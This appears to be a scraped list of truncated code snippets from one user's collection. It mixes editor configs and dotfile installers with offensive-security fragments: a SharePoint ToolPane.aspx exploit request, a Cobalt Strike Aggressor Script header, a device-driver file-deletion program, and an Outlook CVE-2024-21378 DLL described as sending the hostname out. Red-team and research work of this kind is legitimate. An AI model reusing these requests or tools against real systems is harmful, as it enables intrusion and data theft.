lsr00ter

POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7699
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Connection: close

lsr00ter

#
# Safe & sound HTTP request implementation for Cobalt Strike 4.0 Aggressor Script.
# Works with HTTP & HTTPS, GET/POST/etc. + redirections.
#
# Mariusz B. / mgeeky
#

import java.net.URLEncoder;
import java.io.BufferedReader;
import java.io.DataOutputStream;

lsr00ter

#
# Safe & sound HTTP request implementation for Cobalt Strike 4.0 Aggressor Script.
# Works with HTTP & HTTPS, GET/POST/etc. + redirections.
#
# Mariusz B. / mgeeky
#

import java.net.URLEncoder;
import java.io.BufferedReader;
import java.io.DataOutputStream;

lsr00ter

#include <Windows.h>
#include <stdio.h>

const wchar_t* wstrDummyFile = LR"(\??\C:\Windows\System32\kernelbase.dll)";
const char* strDeviceName = R"(\\.\IMFForceDelete123)";

int main() {
	DWORD dwReturnVal = 0;
	DWORD dwBytesReturned = 0;
	BOOL bRes = FALSE;

lsr00ter

/*

  Hex-Rays Decompiler configuration file.

  The syntax of this file is very simple.
  Feel free to edit it to your taste.

  IMPORTANT: the installer overwrites this file. Please make a backup copy
  if you modify this file in any way. Otherwise you may lose your
  modifications!

lsr00ter

{"name":"Angular-Development","settings":"{\"settings\":\"{\\n    \\\"workbench.colorTheme\\\": \\\"GitHub Dark Default\\\",\\n    \\\"workbench.iconTheme\\\": \\\"material-icon-theme\\\",\\n    \\\"search.quickOpen.includeHistory\\\": false,\\n    \\\"terminal.integrated.defaultProfile.windows\\\": \\\"C:\\\\\\\\WINDOWS\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe\\\",\\n    \\\"files.autoSave\\\": \\\"afterDelay\\\",\\n    \\\"files.autoSaveDelay\\\": 5000,\\n    \\\"explorer.confirmDelete\\\": false,\\n    \\\"typescript.updateImportsOnFileMove.enabled\\\": \\\"always\\\",\\n    \\\"terminal.integrated.showExitAlert\\\": false,\\n    \\\"javascript.updateImportsOnFileMove.enabled\\\": \\\"always\\\",\\n    \\\"todo-tree.tree.showScanModeButton\\\": false,\\n    \\\"editor.suggestSelection\\\": \\\"first\\\",\\n    \\\"vsintellicode.modify.editor.suggestSelection\\\": \\\"automaticallyOverrodeDefaultValue\\\",\\n    \\\"java.configuration.checkProjectSettingsExclusions\\\": fal

lsr00ter

/**
 *    This DLL is designed for use in conjunction with the Ruler tool for
 *    security testing related to the CVE-2024-21378 vulnerability, 
 *    specifically targeting MS Outlook.
 * 
 *    It can be used with the following command line syntax:
 *      ruler [auth-params] form add-com [attack-params] --dll ./test.dll
 *    Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
 *
 *    After being loaded into MS Outlook, it sends the PC's hostname and

lsr00ter

{
  "workbench.startupEditor": "newUntitledFile",
  "editor.fontSize": 14,
  "editor.lineHeight": 1.8,
  "javascript.suggest.autoImports": true,
  "javascript.updateImportsOnFileMove.enabled": "always",
  "editor.rulers": [80, 120],
  "extensions.ignoreRecommendations": true,
  "typescript.tsserver.log": "off",
  "files.associations": {

lsr00ter

curl -fsSL \
  "https://gist.github.com/mislav/5706063/raw/vimrc" -o ~/.vimrc \
  "https://gist.github.com/mislav/5706063/raw/ssh_rc.sh" -o ~/.ssh/rc \
  "https://gist.github.com/mislav/5706063/raw/tmux.conf" -o ~/.tmux.conf

curl -fsSL "https://gist.github.com/wr00t/ede9ac998395415fd02898a5e63e2509/raw/zshrc" >> ~/.zshrc

chmod +x ~/.ssh/rc

lsr00ter

#!/bin/bash
set -e

cd $HOME
# install zsh and tmux
sudo yum -y install git zsh tmux

echo "setting antigen and zsh"
curl -L git.io/antigen | sudo tee /opt/antigen.zsh